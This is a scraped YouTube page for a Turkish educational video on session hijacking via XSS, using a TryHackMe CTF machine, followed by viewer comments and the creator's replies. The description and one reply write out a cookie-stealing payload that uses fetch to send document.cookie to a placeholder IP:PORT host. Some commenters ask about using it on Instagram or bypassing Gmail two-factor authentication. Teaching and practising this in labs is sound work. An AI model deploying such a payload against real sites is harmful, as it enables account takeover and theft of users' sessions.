ฝัง
- เผยแพร่เมื่อ 22 ส.ค. 2024
- Merhaba! Ben Sixpon. Bu videoda session hijacking zafiyetinden bahsettim. Normal şartlarda sıklıkla karşımıza çıkmasa da token ve cookie ile hesap ele geçirme saldırıları gerçekten tehlikeli bir siber güvenlik zafiyetidir. Oturum çalma saldırıları, xss gibi hedef sunucu üzerinde script çalıştırabildiğimiz durumlarda kullanılabilir. Bu tarz saldırılara karşı kendinizi savunmanız için böyle bir içerik hazırladım. Lütfen burada öğrendiğiniz bilgileri izninizin olmadığı hiçbir yerde kullanmayın.
Kullandığım CTF - tryhackme.com/...
Komut syntaxi: script fetch("IP:PORT/"+document.cookie) /script (youtube küçüktür büyüktür işaretlerine kızıyor. siz scriptlerden sonra büyüktür küçüktür koyun.)
Sizler de bu CTF'i kullanarak bu saldırının nasıl yapıldığını öğrenip, kendi web sunucunuzu ve kendinizi korumaya alabilirsiniz!
👉TryHackMe'ye kayıt ol: sixpon.com/try...
📜Sertifika istiyorsan: sixpon.com/ine
--------------------------------------
📚 Siber Güvenlik Eğitimlerim: sixpon.com/egi...
🐣 Siber Güvenlik Topluluğumuza Katıl: sixpon.com/dis...
❓ Sık Sorulan Sorular: sixpon.com/sss
🌟- Kanal üyesi ol ve üyelere özel videolara eriş: sixpon.com/katil
--------------------------------------------------------------
İşbirliği, reklam ve sponsorluk için iletişim: sixpon.com/ile...
NOT: Bu kanal ve içerikler yalnızca eğitici amaçlar doğrultusunda oluşturulmuştur. Ben yalnızca bana ait olan veya iznimin olduğu sistemleri ve cihazların güvenliğini test ediyorum. Burada öğrendiklerinizi size ait olmayan / izninizin olmadığı sistemlerde denemeyin.
NOTE: This channel and contents is made for educational purposes only, I only test devices and systems that i own or have permission to test, you should not test the security of devices that you do not own or do not have permission to test.
---------------------
kral helal olsun gerçekten çok güzel anlatmışssın. Çok ciddi 3 gündür bu konu ile ilgili araştırma yapıyorum ama hiçbi şekilde anlaşılır bir türkçe kaynak bulamamıştım, ama sayende öğrendim çok teşekkür ederim
Abi üst düzey hacking içerikleri de gelsin sadece temel seviye değil mesela exploit yazabiliriz seviliyorsun
Bir şeyler geliştirme ve Yazma konularını ben pek sevmiyorum hocam. Onlar siber güvenliğin development kısmına giriyor. Ben sızma testleri üzerine içerikler üretiyorum. Ve de ürettiğim içerikleri en basite indirgeyerek anlattığım için giriş seviyesi olarak gözüküyor olabilir. 😂 Yorumun için teşekkür ederim
Dostum bu zaten ileri seviye bir konu :)
çok açıklayıcı olmuş 👍
abi ben senin kanalını keşfetmeden önce gerçekten hiç bir şey bilmiyordum cft falan nedir bilmiyordum sadece bir tane udemy kursu almıştım hiç işe yaramadı ama artık sayende ctf çözebiliyorum (bugün benim doğum günüm)
Hocam öncelikle duyduğuma çok sevindim. Yardımcı olabildiysem ne mutlu! Umarım çok daha iyi yerlere gelirsiniz Ayrıca doğum gününüzü de en içten dileklerimle kutluyorum. Artık pastanın üstüne güzel bir doğum günü ctf'i gider
@@Sixpon zaten üstüne ctf çözdüm xd
Anlatım yeteneğin gerçekten güçlü 👏👍 ağzına sağlık 👏👏
Güzel yorumunuz için teşekkür ediyorum hocam
@@Sixpon rica ederim hocam ne demek
Abi, merhabalar. Öncelikle söylemek isterdim ki, çok iyi anlatıyorsun!, ikinci olarak, bir sorum olucaktı, hangi ctf çözdün?bu arada Azerbaycandan selamlar!, seviliyorsun✌🏻
Selamlar hocam. Ctf olarak tryhackme marketplace üzerinden ufak bir örnek gösterdim. Sizler de oradan deneyebilirsiniz.
emeğine sağlık abim
mantığını çok güzel anlatmışsın
cok güzel anlatım sagol
Kullanışlı ve kolay eline sağlık
Eline sağlık abi
03.39 da ki solda açılan siyah ekran nasıl acliyor Windows 8 de oluyor mu Windows 8 de cmd var ne yazarsam yazayım hata veriyor her seferinde nasıl yapabilirim
İki asamali dogrulama olan gmail hesabinda ise yararmi sifreyi biliyorum ama dogrulamayi gecemiyorumm yolu nedir
Eline sağlık
Teşekkür ederim hocam
hocam bunu hangi sitelerde yapabiliyoruz
Hocam diğer databaseli websitesinde kolay takip yapabilmek için bir website alt yapısı var mı bunları kolay depolamak için arayüzlü
Hocam cümleniz çok devrik olduğu için tam anlayamadım. Eğer database'e arayüzlü ve kolay erişmek için bir altyapı var mı? diye soruyorsanız, evet bu tarz sistemler var. Wordpress, phpmyadmin gibi bir çok cms'in databaseler ile uyumlu çalıştığı durumlar mevcut. Eğer sorunuzu farklı anladıysam lütfen tekrar sorun, yardımcı olmaya çalışayım.
abi güzel anlatıyorsun da ben bunu deneyecek bir site bulamadım bir site önerebilir misin
tryhackme.com/room/marketplace videoda kullandığım makine
👏
❤️🔥❤️🔥
Bu şekilde hesabını hacklediğimiz kişinin oturumuna şifresiz bir şekilde giriş yapabilir miyiz?
Evet hocam, cookie bilgisini kendi cookie'miz olarak gösterip giriş yapabiliriz.
@@Sixpon Teşekkürler. Bizim platform da olmadı muhtemelen Key diye bir şey var onu da PHP tarafindan kontrol ediliyor diye düşünüyorum
script nerede hocam?
fetch("IP:PORT/"+document.cookie)
Saçları beyaza boyatıp kanalın ismini Sixpon of rivia yapman yok mu ?
Kardeşim ekmeğin arasına peynir koyamıyoruz neyin riviası 😂😂
@@Sixpon Some Tekirdağ problems
@@Sixpon hocam bimde yerli muz 12 liraya düşmüş sonuçta zengin itemi
hangi ctf bu hocam
Açıklamada yazıyor hocam
sana nasıl ulaşabilirim
Buradan ulaşabiliyorsunuz zaten hocam. Onun haricinde bir konu varsa discord sunucusunun soru-cevap kısmına konu açabilirsiniz. Özelden yardımcı olmuyorum, üzgünüm.
@@Sixpon bende scripte kadar her şey oke ondan sore yok
eline sağlık abi
abi bu scripti instagram vb. yerlerde aynı videodaki gibi nasıl yaparız kendi üzerimde test etmek istiyorum
Hocam instagram'da bulunan session id verisini nasıl alabiliriz?
Burpsuite gibi bir proxy kullanarak giden ve gelen istekleri inceleyebilirsiniz.
@@Sixpon çok sağolun hocam